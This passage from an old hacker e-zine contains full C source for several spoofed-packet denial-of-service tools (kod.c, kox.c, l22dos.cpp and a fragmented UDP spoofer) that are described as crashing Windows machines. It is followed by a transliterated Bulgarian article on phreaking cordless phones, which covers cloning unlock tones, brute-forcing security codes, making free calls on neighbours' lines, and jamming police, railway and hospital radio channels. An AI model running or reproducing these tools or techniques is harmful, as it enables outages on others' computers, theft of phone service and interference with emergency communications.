res = gethostbyname(host_name);
if (res == NULL)
return (0);
memcpy(&ip_bytes, res->h_addr, res->h_length);
return (ip_bytes);
}
void quit(char *reason)
{
perror(reason);
close(spf_sck);
exit(-1);
}
int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
int dst_prt)
{
int bs;
struct sockaddr_in to;
memset(&pkt, 0, psize);
/* Fill in ip header */
pkt.ip.version = 4;
pkt.ip.ihl = 5;
pkt.ip.tot_len = htons(udplen + iplen + PADDING);
pkt.ip.id = htons(0x455);
pkt.ip.ttl = 255;
pkt.ip.protocol = IP_UDP;
pkt.ip.saddr = src_addr;
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons(0x2000); /* more to come */
pkt.udp.source = htons(src_prt); /* udp header */
pkt.udp.dest = htons(dst_prt);
pkt.udp.len = htons(8 + PADDING);
/* send 1st frag */
to.sin_family = AF_INET;
to.sin_port = src_prt;
to.sin_addr.s_addr = dst_addr;
bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
sizeof(struct sockaddr));
pkt.ip.frag_off = htons(FRG_CONST + 1); /* shinanigan */
pkt.ip.tot_len = htons(iplen + FRG_CONST);
/* 2nd frag */
bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
(struct sockaddr *) &to, sizeof(struct sockaddr));
return bs;
}
void main(int argc, char *argv[])
{
u_long src_addr,
dst_addr;
int i,
src_prt=53,
dst_prt=53,
bs = 1,
pkt_count = 10; /* Default amount */
if (argc < 3)
usage();
if (argc == 4)
pkt_count = atoi(argv[3]); /* 10 does the trick */
/* Resolve hostnames */
src_addr = host_to_ip(argv[1]);
if (!src_addr)
quit("bad source host");
dst_addr = host_to_ip(argv[2]);
if (!dst_addr)
quit("bad target host");
spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (!spf_sck)
quit("socket()");
if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
sizeof(bs)) < 0)
quit("IP_HDRINCL");
for (i = 0; i < pkt_count; ++i)
{
fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt);
usleep(10000);
}
printf("Done.\n");
}
----- cut ----- cut -----
----- kod.c ----- cut ----- cut -----
/*
::: kod.c (kiss of death) version 1.2
::: [author] kod.c bug found by klepto /
klepto@levitate.net / rewritten by ignitor / ignitor@EFnet
::: [stuph ] works on bsd/linux/*nix
::: [notes ] bluescreens windows users(98/98se) and kills
tcp stack
::: [m$ bug] windows handles igmp badly and this is the
result
::: [greets]
amputee/nizda/nyt/ignitor/skyline/codelogic/ill`/conio/egotr
ip/TFreak/napster
::: [greets] dist(test monkey)/naz(you rule period.)/#havok/
#irc_addict/#kgb/#eof/everyone
::: [action] ./kod <host> and BEWM!
::: [rant ] there will be lots of rewrites to this.. just
get our name right!
de omnibus dubitandum
*/
/*
windows core dump output (*whee*)
An exception 0E has occurred at 0028:C14C9212 in VxD VIP
(01) +
00006C72. This was called from 0028:C183FF54 in VcD PPPMAC
(04) +
000079BR. It may be possible to continue normally(*not*).
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
struct iphdr
{
unsigned char ihl:4, version:4, tos;
unsigned short tot_len, id, frag_off;
unsigned char ttl, protocol;
unsigned short check;
unsigned int saddr, daddr;
};
struct igmphdr
{
unsigned char type, code;
unsigned short cksum;
struct in_addr group;
};
unsigned short in_chksum(unsigned short *, int);
long resolve(char *);
long resolve(char *host)
{
struct hostent *hst;
long addr;
hst = gethostbyname(host);
if (hst == NULL)
return(-1);
memcpy(&addr, hst->h_addr, hst->h_length);
return(addr);
}
int main(int argc, char *argv[])
{
struct sockaddr_in dst;
struct iphdr *ip;
struct igmphdr *igmp;
long daddr, saddr;
int s, i=0, c, len;
char buf[1500];
if (argc < 3)
{
printf("KOD spoofer by Ignitor and klepto\n");
printf("Usage: %s <src> <dst>\n", *argv);
return(1);
}
daddr = resolve(argv[2]);
saddr = resolve(argv[1]);
memset(buf, 0, 1500);
ip = (struct iphdr *)&buf;
igmp = (struct igmphdr *)&buf[sizeof(struct iphdr)];
dst.sin_addr.s_addr = daddr;
dst.sin_family = AF_INET;
ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->tot_len = htons(10933);
ip->id = htons(48648);
ip->ttl = 64;
ip->protocol = IPPROTO_IGMP;
ip->check = in_chksum((unsigned short *)ip, sizeof(struct
iphdr));
ip->saddr = saddr;
ip->daddr = daddr;
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);
printf("Sending IGMP packets: %s -> %s\n", argv[1], argv
[2]);
for (c=0;c<2;c++)
{
len = 220;
ip->frag_off = htons(0x73a);
for (i=0;;i++)
{
if (sendto(s,&buf,len,0,(struct sockaddr *)&dst,sizeof
(struct sockaddr_in)) == -1)
{
perror("Error sending packet");
exit(-1);
}
if (ntohs(ip->frag_off) == 0x2000)
break;
len = 1500;
if (!i)
ip->frag_off = htons(0x2681);
else
ip->frag_off = htons(ntohs(ip->frag_off) - 185);
ip->check = in_chksum((unsigned short *)ip, sizeof
(struct iphdr));
}
}
return(1);
}
unsigned short in_chksum(unsigned short *addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
----- cut ----- cut -----
----- kox.c ----- cut ----- cut -----
/***
Kox by Coolio (coolio@k-r4d.com)
this was a successful attempt to duplicate klepto/defile's kod win98
exploit and add spoofing support to it. me and defile made this a
race to see who could do spoofing kod first. he won. (mine's better!)
my kox and defile's skod output about the same packets
but he had skod working a few hours before i had kox working.
affected systems: windows 98, windows 98 SE, windows 2000 build 2000
results: bluescreen, tcp/ip stack failure, lockup, or instant reboot
thanks to klepto and defile for making kod, psilord for wanting
to understand what we were doing, greg for telling me about iphdr.ihl,
mancide for letting me use his win98 boxen to test on, and the
few other people i crashed trying to get this working right.
also thanks to the authors of elvis for making such a badass editor.
***/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <string.h>
#include <errno.h>
#include <pwd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/igmp.h>
void usage(char *arg)
{
printf("Kox by Coolio (coolio@k-r4d.com)\n");
printf("Usage: %s <victim>\n", arg);
exit(1);
}
unsigned int randip()
{
struct hostent *he;
struct sockaddr_in sin;
char *buf = (char *)calloc(1, sizeof(char) * 16);
sprintf(buf, "%d.%d.%d.%d",
(random()%191)+23,
(random()%253)+1,
(random()%253)+1,
(random()%253)+1);
inet_aton(buf, (struct in_addr *)&sin);
return sin.sin_addr.s_addr;
}
unsigned short in_cksum(unsigned short *buh, int len)
{
register long sum = 0;
unsigned short oddbyte;
register unsigned short answer;
while(len > 1) {
sum += *buh++;
len -= 2;
}
if(len == 1) {
oddbyte = 0;
*((unsigned char *)&oddbyte) = *(unsigned char *)buh;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xFFFF);
sum += (sum >> 16);
answer = ~sum;
return answer;
}
int nuke_igmp(struct sockaddr_in *victim, unsigned long spoof)
{
int BIGIGMP = 1500;
unsigned char *pkt;
struct iphdr *ip;
struct igmphdr *igmp;
struct utsname *un;
struct passwd *p;
int i, s;
int id = (random() % 40000) + 500;
pkt = (unsigned char *)calloc(1, BIGIGMP);
ip = (struct iphdr *)pkt;
igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr));
ip->version = 4;
ip->ihl = (sizeof *ip) / 4;
ip->ttl = 255;
ip->tot_len = htons(BIGIGMP);
ip->protocol = IPPROTO_IGMP;
ip->id = htons(id);
ip->frag_off = htons(IP_MF);
ip->saddr = spoof;
ip->daddr = victim->sin_addr.s_addr;
ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));
igmp->type = 0;
igmp->group = 0;
igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr));
for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1;
i < BIGIGMP; i++)
pkt[i] = random() % 255;
#ifndef I_GROK
un = (struct utsname *)(pkt + sizeof(struct iphdr) +
sizeof(struct igmphdr) + 40);
uname(un);
p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10);
memcpy(p, getpwuid(getuid()), sizeof(struct passwd));
#endif
if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("error: socket()");
return 1;
}
if(sendto(s, pkt, BIGIGMP, 0, victim,
sizeof(struct sockaddr_in)) == -1) {
perror("error: sendto()");
return 1;
}
usleep(1000000);
for(i = 1; i < 5; i++) {
if(i > 3)
ip->frag_off = htons(((BIGIGMP-20) * i) >> 3);
else
ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF);
sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in));
usleep(2000000);
}
free(pkt);
close(s);
return 0;
}
int main(int argc, char *argv[])
{
struct sockaddr_in victim;
struct hostent *he;
int i;
srandom(time(NULL));
if(argc < 2)
usage(argv[0]);
if((he = gethostbyname(argv[1])) == NULL) {
herror(argv[1]);
exit(1);
}
memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length);
victim.sin_port = htons(0);
victim.sin_family = PF_INET;
printf("IGMP> ");
fflush(stdout);
for(i = 0; i < 10; i++)
{
nuke_igmp(&victim, randip());
printf(".");
fflush(stdout);
}
printf("\n");
fflush(stdout);
}
----- cut ----- cut -----
----- l22dos.cpp ----- cut ----- cut -----
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
struct icmp_hdr
{
struct iphdr iph;
struct icmp icp;
char text[1002];
} icmph;
int in_cksum(int *ptr, int nbytes)
{
long sum;
u_short oddbyte, answer;
sum = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
if (nbytes == 1)
{
oddbyte = 0;
*((u_char *)&oddbyte) = *(u_char *)ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
struct sockaddr_in sock_open(char *address, int socket, int prt)
{
struct hostent *host;
if ((host = gethostbyname(address)) == NULL)
{
perror("Unable to get host name");
exit(-1);
}
struct sockaddr_in sin;
bzero((char *)&sin, sizeof(sin));
sin.sin_family = PF_INET;
sin.sin_port = htons(prt);
bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
return(sin);
}
void main(int argc, char **argv)
{
int sock, i, ctr, k;
int on = 1;
struct sockaddr_in addrs;
if (argc < 3)
{
printf("Usage: %s <ip_addr> <port>\n", argv[0]);
exit(-1);
}
for (i = 0; i < 1002; i++)
{
icmph.text[i] = random() % 255;
}
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
{
perror("Can't set IP_HDRINCL option on socket");
}
if (sock < 0)
{
exit(-1);
}
fflush(stdout);
for (ctr = 0;ctr < 1001;ctr++)
{
ctr = ctr % 1000;
addrs = sock_open(argv[1], sock, atoi(argv[2]));
icmph.iph.version = 4;
icmph.iph.ihl = 6;
icmph.iph.tot_len = 1024;
icmph.iph.id = htons(0x001);
icmph.iph.ttl = 255;
icmph.iph.protocol = IPPROTO_ICMP;
icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) +
((random() % 255) * 65535) +
((random() % 255) * 255) +
(random() % 255);
icmph.iph.daddr = addrs.sin_addr.s_addr;
icmph.iph.frag_off = htons(0);
icmph.icp.icmp_type = random() % 14;
icmph.icp.icmp_code = random() % 10;
icmph.icp.icmp_cksum = 0;
icmph.icp.icmp_id = 2650;
icmph.icp.icmp_seq = random() % 255;
icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024);
if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1)
{
if (errno != ENOBUFS) printf("X");
}
if (ctr == 0) printf("b00m ");
fflush(stdout);
}
close(sock);
}
----- cut ----- cut -----
E, tova e to. Iskreno se nadiavam, che shte izpolzvate gornata informacia
samo za obrazovatelni celi, ili pone s dosta miara, zashtoto niama nishto
po-glupavo ot bezsmislenite ataki.
15.8.1999
IronCode
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#08ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Phreaking RadioPhones and BigPhun Lud Phreak
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
Part One. Advanced RadioPhreak
Sled dwe statii na tema prihwashtane na radio-izlychwaniata, logichno shte e
da se stigne do ideiata za radio-phreak. Shte se spra na niakolko aspekta po
temata, koiato, nadiawam se, shte prodylzhi i w sledwashtite broewe na
PHREEDOM!
Oshte w nachaloto na 90-te godini w Bulgaria masowo se namnozhiha telefonni
udylzhiteli, radiostancii i drugi communication aparaturi. Poweche ili po-
malko te naprawo si plachat za phreakwane. Niakoi sa dostatychno lesni za
towa, a drugi iziskwat dosta poznania po (radio)electronics. Shte zapochna s
radio-phone za "dom.polzwane". Predstawiteli sa napr. Panasonic cordless
phone i drugi takiwa, raboteshti w obhwata 46/49 Mhz. Tochnite chestoti na
kanalite sa:
Base Handset Base Handset
------------------------- ------------------------
46.61 MHz 49.670 MHz 46.77 MHz 49.830 MHz
46.63 MHz 49.845 MHz 46.83 MHz 49.890 MHz
46.67 MHz 49.860 MHz 46.87 MHz 49.930 MHz
46.71 MHz 49.770 MHz 46.93 MHz 49.990 MHz
46.73 MHz 49.875 MHz 46.97 MHz 49.970 MHz
Principyt na rabota na po-prostite modeli e sledniat: slushalkata
(handset-yt) otwaria majkata (Base) s pomoshta na tonche, kratyk zwuk s
chestota okolo 5 kHz. Zadyrzhaneto na liniata otworena stawa dotogawa,
dokato Base priema signal ot Handset-a. Sys syshtoto tonche stawa impulsnoto
izbirane na nomera. Ako izbirate naprimer 9, handset-yt izluchwa sys signala
kym Base-to 9 kysi 5 kHz signala nakysani taka, kakto bi se izbralo i ot
shajbata na obiknowenia telephon. Nakraia na razgowora (kogato se zatwaria),
handset-yt obiknowenno izlychwa prodylzhitelen signal 5kHz s narastwashta
chestota, koeto e signal za zatwariane na liniata. Izkluchenie za zatwariane
na liniata e sluchaiat, kogato signalyt ot hanset-a stane mnogo slab. W
takyw sluchaj Base izchakwa niakolko sekundi i ako niama poweche radiosignal
ot handset-a, liniata se zatwaria.
Nachini za "zashtita" na tezi phones:
Obiknowenno ili niama takiwa, ili ima kluch s niakolko polozhenia, s kojto
se smenia chestotata za otwariane/zatwariane - tia mozhe da warira ot okolo
5 do okolo 6-7 kHz.
Nachini za phreak:
1. Naj prostia nachin e da se razhodite iz grada s washia phone, kato go
wkliuchwate ot wreme na wreme, za da probwate dali niama da popadnete na
drug takyw na syshtia kanal (wse pak te sa samo 10) i na syshtata
chestota za otwariane/zatwariane. Obshto wzeto metod s naj-malko
rezultati. Moiat sywet - ne se zanimawajte s tozi typ nachin. Prosto
mozhete da opitate samo za proba.
2. Ako iskate neshto po-seriozno, shte wi triabwa komputyr sys SB. Ponezhe
riadko mozhe da se polzwa Laptop (pri towa sys SB), pyk i ne e osobenno
udobno da se raznasia wsichko, naj-dobre e da se wyoryzhite i s wynshna
antena. Kak mozhete da si naprawite antena shte obiasnia po-kysno. Shte
wi triabwat i poznania po electronics.
Ideiata e slednata:
Majkata priema na dadenia kanal neprekysnato. Ako i se swyrzhe wynshnata
antena, tia shte si uwelichi i radiusa na dejstwie. Triabwa da namerite
chip-a, s kojto e realiziran priemnika. Toj obiknowenno e naprawen s MC3357,
MC3359, MC3361 (Motorola) ili proizwodstwo na drugi firmi. Sled kato go
otkriete, triabwa da swyrzhete LineIn na SB kym izwoda za niska chestota na
priemnika (direkten izhod ot chestotnia diskriminator), izlizasht ot chip-a.
Tam bi triabwalo da se chuwa shum podoben na shuma, kogato ne e nastroen na
stancia UKW priemnik, ako pyk pusnete washia handset, triabwa da chuwate
sobstwenia si glas. Izpolzwajte programa, s koiato shte mozhete da zapiswate
kakwo priema Base-to. Ako ima naokolo drugi Handset na syshtia kanal kato
washia i komshiata reche da pliampa po shibania si phone, Base-to nepremenno
shte go priema, nezawisimo, che toncheto, koeto ia otwaria (ne) e syshtoto!
Ako ste zapisali razgowora, izpolzwajte niakakwa programa s koiato shte
mozhete da razgledate zwukowia file i da mu naprawite chestoten analiz. Az
izpolzwam CoolEdit 96! Proslushajte nachaloto (ili izbiraneto), sled
chestotnia analiz shte znaete i chestotata na tona za otwariane.
Ostawa da razglobite i washata slushalka i da namerite trimer-potenciometyra
za donastrojka na tona na Handset-a. Namestete go, dokato stane na syshtata
chestota kato komshijskia. Izpolzwajte Base-to i computer-a za pomoshtno
sredstwo, ako niamate chestotomer. Ostawa da zakachite wynshnata antena za
Handset-a, da izkluchite washoto Base i da probwate komshiiskia phone. Ako
wse pak neshto ne stane, srawnete otnowo dali chestotite sywpadat.
Ako imate Panasonic ili podoben phone modeli ot predi 2-3 godini, shte imate
malko poweche problemi. Pri tiah otwarianeto, zatwarianeto i izbiraneto
stawa chrez kod, kojto se genirira ot CPU na phone-to. Loshoto oshte e, che
i tozi kod se meni kogato Handset-a se slozhi da se zarezhda. Ako si
poigraete poweche po gornia nachin, shte mozhete da zapishete i cifrowia
kod, no sled towa shte triabwa ot computer-a da go wkarate w predawatelia na
Handset-a. Za towa shte sa wi neobhodimi i shemite na phone-to ili dosta
poznania po electronika :-(
Phreaking SENAO SN-889MCA ili SN-688MCA: (Advanced Phreak)
(BTW ne samo tia modeli ami i drugi marki :-)
W posledno wreme se wnasiat cordless phone s goliam obhwat. Takiwa marka e
naprimer SENAO (i drugi).
Razlichnite modeli rabotiat na razlichni chestoti: 44/82Mhz; 74/116Mhz;
72/134Mhz; 74/136Mhz; ima warianti na okolo 2xx,3xx,4xx,8xx i 9xx Mhz
Model SN-889MCA izpolzwa chestotite :
72 Mhz - izlychwa Base
134 Mhz - izlychwa Handset
Za phona pishe : 65536 sets security code (two-way)! - Tia kwo gybarkat li
se s phreaker-a. Kat slozhili 65000 kombinacii si misliat, che sa go
zashtitili.
Ako imate scanner mozhete da opredelite dwete chestoti, na koito raboti
phona. Shte wi triabwa i radiostancia, za da mozhete gi phreaknete.
Naj udoben (moe mnenie) e modela na SENAO kojto raboti na 72/136Mhz
S pomoshta na radiostancia mozhe da se predawa na 136 Mhz i sys scanner da
se slusha na 72 Mhz. Tozi model izpolzwa 16bit kod za otwariane i zatwariane
i 4 bit kod za izbiranata cifra.
Formatyt na otwariane/ zatwariane e slednia:
Sinhro/4bit/16bit/Sinhro/4bit/16bit/Sinhro/4bit/16bit/Sinhro
4bit kod:
otwariane : 1111
zatwariane: 1011
16bit kod: security kod na phona, w celia paket e edin i sysht!
Izbiraneto e: Sinhro/1100/4bit(cifra)*4pyti/Sinhro
4bit kod izbirane na cifra:
1: 0111 6: 1001
2: 1011 7: 0001
3: 0011 8: 1110
4: 1101 9: 0110
5: 0101 0: 1010
Sinhro : +------+
| |
| 10mS | 10mS - Izlychwat se 4 posledowatelni
+ +------+ impulsa
Kod (4/16bit): +---+ +----+
| | | |
(1) |4mS|4mS (0) |7mS |7mS
+ +---+ + +----+
BTW, Imam razrabotena programa za tozi phone. Ako niakoj se interesuwa,
mozhe da ia poluchi sys source-to na P(r)ascal. Phreeware :-) Programata e
raboteshta i e izprobwana. Imam wariant za SB i LPT. Programata e samo za
izlychwane na koda. Kojto si niama rabota - da misli kak mozhe da se
dekodira koda direktno ot priemnika!
Modulaciata koiato se izpolzwa e FSK (Frequency Shift Keying), t.e.
noseshtia signal ot predawatelia se modulira direktno. Za towa e nuzhno da
se naprawi i syotwetnata modifikacia w radiostanciata, koiato se izpolzwa,
za da mozhe da izlychi cifrowia (FSK) signal. Ot znachenie e i dali
cifrowiat signal pri priemaneto ne e invertiran. Ako e taka, triabwa da se
invertira otnowo predi izlychwaneto.
Tozi phone syshto si meni koda kogato se postawi za zarezhdane. Toj se
smenia do momenta, kogato Handset-a se wzeme ot Base-to i na praktika ne
mozhe da se razbere kakyw shte e toj. (BTW: mozhe da se smenia i
distancionno ot handseta)
Obiknowenno tozi tip phone ima goliam radius na dejstwie i Handset-yt se
raznasia kyde li ne sys sobstwenika. Taka che kodyt naj-chesto se smenia
wecher kato se pribere typoto kopele (oswen ako ne se usymni w neshto i ne
go smeni ot handset-a).
Ako zapishete koda sutrinta, ima goliama weroiatnost da ostane syshtia do
wecherta :-). Ako ne, shte wi triabwa malko tyrpenie, za da zapishete niakoj
razgowor i razberete koda. Inache probwajte s Brute Force (ako se pisheshe
taka ;-), t.e. wyrtete wsichki wyzmozhni kodowe, ako imate wreme :-P
Niakolko dumi za smykwaneto na kod-a. Izpolzwate radiostanciata, koiato
priema na chestotata na slushalkata. Nuzhen e otnowo izhod ot chestotnia
diskriminator (chip-a na priemnika). W protiwen sluchaj FSK (cifrowia)
signal shte byde izkriwen do neuznawaemost ot usilwatelite sled nego
(usilwatelia za goworitelia naprimer). Izpolzwajte otnowo programa za zapis
(kakto kazah, CoolEdit96 naprimer). Ako niama programa za direktno skanirane
na koda ot priemnika, poglednete wnimatelno impulsite. Shte razlichite iasno
po-dylgite(0) i po-kysi impulsi(1), i Sinhro-to. Mozhete da zapishete koda
na listche, sled koeto da go wkarate w programa, koiato mozhe da generira RF
protocola.
S pomoshta na scanner UBC65XLT i radiostancia Alinco DJ-S1 sym phreakwal bez
problemi tezi modeli, kato wryzkata e duplexna. Sys scanner-a se slusha, a
sys radiostanciata se predawa neprekysnato prez celia razgowor. BTW:
scanner-a wi triabwa samo za da slushate signala ot majkata, taka che ako
niamate scanner, wmesto nego izpolzwajte UKW priemnik - ruski standart. Toj
mozhe da priema na 72-74Mhz :-). Izpolzwajte slushalki, inache pri phreak
mozhe da stane nepriatna microphonia.
Problemi pri phreakwaneto na radiophones:
Typite kopeldaci obiknowenno swyrzwat po oshte edin (normalen) phone zaedno
sys cordless. Towa oznachawa, che ako izbirate s phreak, drugia phone shte
drynka syshto :-(. Zatowa predi wsichko prosledete tozi, kojto polzwa phona.
Razberete (ot razgoworite, razbira se) po koe wreme e nawyn i ima li niakoj
u tiah (napr. polzwa li Intercom-a). Ako ste siguren, che nikoj niama da
chue drynkaneto, dejstwajte smelo, pyk i da wi usetiat - ti si sedish w
kyshti i niama koj da razbere koj si i za kakwo se borish :-). Problemite
idwat ako goworite i onia wzeme, che digne slushalkata na phona. Ako digne
drugia (normalnia), niama da mozhe da se zatwori liniata. Taka che ne e zle
tozi, s kogoto se gowori, da se predupredi (napr. w nachaloto na razgowora)
da zatwori, ako typoto kopele wzeme da otwori shibania si phone. Mozhe i
po-naglo: prosto tribwa da se skarash na choweka, kojto si e dignal
sobstwenia phone, i da go ubedish s edna majna, che se e natresyl na twoia
razgowor. Toia nomer winagi minawa ako wdigne niakoia dyrta lelia ili
sysedka. Ne spomenawajte za telefonni udylzhiteli ili neshto swyrzano s
phreak. Be prosto si izlejte dushata sreshtu B(F)TK. Psuwajte gi spokojno.
Onia mozhe daje da wi podkre- piat! :-)))
Ako neshtata sluchajno se wloshat za was (dano ne stawa), naprimer onia e
razbral kyde e wyrtiano, namerete nachin da stane izwestno, che onia ima
radiophone. bE(F)tEkArItE izobshto niama da mu obyrnat wnimanie. Problema si
e na onia, kojto si e wkluchil "telefonche s antenka" i shte mu tegliat
edna.
BTW, Towa e naj bezopasnia nachin za phreak. Oshte poweche, che onia s phone
SENAO weche gi podgoniha, che niamat razreshitelno za chestotite, na koito
sa phone-tata im. Taka che PHREAK DO DUPKA!!!
PART Two: Phun s radiostanciata :-)))
Ako si namerite radiostancia za obhwata (130)140-170 Mhz, mozhete da se
pozabawliawete, kato scanirate chestotite i podslushwate razlichni sluzhbi
i hora, izpolzwashti efira. Chestotite na tozi obhwat se izpolzwat gore-dolu
taka:
134 - 136 Mhz - RadioPhones
144 - 146 Mhz - Radiolubiteli (Ham radio band)
147 - 149 Mhz - Military, MPolice
150,150 - 150,200 - Mobikom - Pagers (w cialata strana)
150,200 - 150,700 - B.D. Zheleznici (Goliam Phun)
156 - Morski kanali
157,700 - 158,300 - Trunk (MPT1327) na bolnicite.
165 Mhz - Police
169,170 Mhz - Police
Towa e samo primeren spisyk na izpolzwaneto na chestotite. Oswen tezi
sluzhbi mozhete da otkriete i Pozharna, Banki, Phone udylzhiteli na
razlichni firmi, Razlichni pirati, izpolzwashti nezakonno (HaHaHa) niakoia
chestota.
Ako zasechete niakogo, oslushajte se. Ako reshite, che mozhete da se
pozabawliawate s tiah, prigotwete se za BIG PHUN. BTW, ne wi preporychwam da
se mesite na: police, MilPolice - mogat da wi zasekat ot kyde izlychwate (e,
pone w golemite gradowe); Radiolubiteli: Mogat da wi zasekat dori po-byrzo
ot policiata i MP; Ohranitelni firmi - mnogo biat ;-); i drugi koito mozhe
bi imat licenz za radiochestotata. No nabarate li niakoj, kojto ne e ot tia,
ne proshtawajte :-)))
Idei:
1. Zapishete s SB niakolko repliki na tezi, koito se obazhdat. Sled kato si
nabawite rechnik, pochnete da gi puskate na kanala. Tozi, kojto ste
zapisali, niama da si poznae sobstwenia glas, za smetka na towa wsichki
ostanali shte go poznaiat. Kupon-yt zapochwa :-)
2. Naprawete si PAPAGAL. Twa e ustrojstwo (ili programa), koiato zapiswa ako
ima signal na kanala i sled kraia na signala go puska (powtaria wsichko
na kanala). Tezi, koito ne sa slushali takowa neshto, ima da se psuwat do
nasirane.
3. Duhajte w mikrofona. Towa winagi e wbesiawalo slushashtite. Ne slushajte
psuwnite po wash adres, ami gi zapishete na SB. Izpolzwajte sled towa t1!
4. Ako radiostanciata ima DTMF klawiatura, si izmislete niakakwa melodiika,
napr. "Chorba-Kasha", "Zajchenceto bialo" i t.n. - puskajte gi ot wreme
na wreme :-)))))))
Phreak sys radiostancia:
Neshta koito mozhete da phreakwate sys radiostancia:
1. Pager - 150.175Mhz 150.200Mhz.
2. Telefonni udylzhiteli s radiostancii (Phone Trunk)
3. MPT1327 Trunk - Bolnicite - Poweche za phun, otkolkoto neshto
polezno, shtoto niamat izhod kym phone (pone wse oshte ne sym chuwal
za takowa neshto)
4. Mobifoni - Obhwat 450-460 Mhz
Zabelezhki:
1. Software za pagerite - kolkoto shtesh. Chowek triabwa samo da se
poogleda - Pager-ite sa na protokol POCSAG. Lesno shte namerite neshto s
wsiaka tyrsachka, ili mi pratete mail po wyprosa.
2. Za telefonnite udylzhiteli se polzwat DTMF tonowe. Razberete dwata
kanala, na koito rabotiat. Kato imate kombinaciata za otariane, niama da
imate problem. Gledajte da ne prekaliawate, shtoto dosta ot tiah imat
komputer za log-wane i mozhe da se nabie na ochi. Poiawiha se i cifrowi
trunkowe. Za tiah wse oshte niamam dostatychno info, taka che ako
popadnete na takyw, obadete se.
3. MPT1327 Trunk rabotiat s cifrow signal, na kojto 1 se kodira s ton
1200Hz, a 0 - s 2400Hz (mozhe i da e obratnoto) i baudrate 1200 bps. Ako
zapishete powikwane ot niakoia linejka do centralata, mozhete da go
powtorite i da otworite trunka-a i da napsuwate centralistkata :-))).
Interestnoto pri tiah e, che s cifrowia paket wyrwi ASCII info za
wikashtata stancia (koiato izliza na ekranche na stanciite, koito se
polzwat).
(Bel.Iron - vse pak ne se gavrete mnogo s bolnicite. Te vse pak spasiavat
choveshki zhivoti, a edna takava gavra mozhe da im poprechi da go
napraviat. Vse pak nie sme hora, a ne izvergi)
4. Mobifonite rabotiat duplexno na 453-465Mhz, kato kletkata izluchwa na
gornata chestota, a mobifona na (tochno) 10Mhz po-niska chestota. Ako
imate radiostancia za tozi obhwat, predawajte na chestotata na mobifona.
Stawa goliam PHUN!
APENDIX A
---------
NFM DISCRIMINATOR CHIPS - BASEBAND AUDIO - SQUELCH GATE DATA
============================================================
There is a growing interest in tapping the baseband audio out of various
scanners for decoding of a variety of esoteric signals, including CTCSS,
SCA, FSK, RTTY, FAX, etc. By and large, such signals cannot be take from
TAPE REC jacks, headphone jacks, and EXT SPEAKER jacks because of the
voice-band filtering that is done between the signal source and these output
jacks.
Therefore, it is necessary to tap the "baseband audio" directly at the
output of the discriminator chip for your scanner. The below Table shows a
list of scanners, the discriminator chip(s) used in the scanner, circuit
symbols of those chips, and three pins of general interest on the chips:
RF-Input, Scan Control, and, of course, the baseband audio pin.
Even though your scanner may not be listed, if you can find its
discriminator chip, it will be listed with one or more scanners below, the
pins of which will be the same for your unlisted scanner! Corrections and
additions to this list are requested. See my mail and other addresses at the
end of this file.
SCANNER DISCRIMINATOR CHIP PINS OF INTEREST
CKT RF-in SCAN AUDIO
SCANNER NFM CHIP TYPE SYMBOL Pin Pin BASEBAND
=============== =============== ======= ===== ===== =========
Not known MPS5071 n/a 16 13 9
AR-1000 TA-7787AF IC-4 16 none 9
AR-2002 MC-3357P IC-4 16 13 9
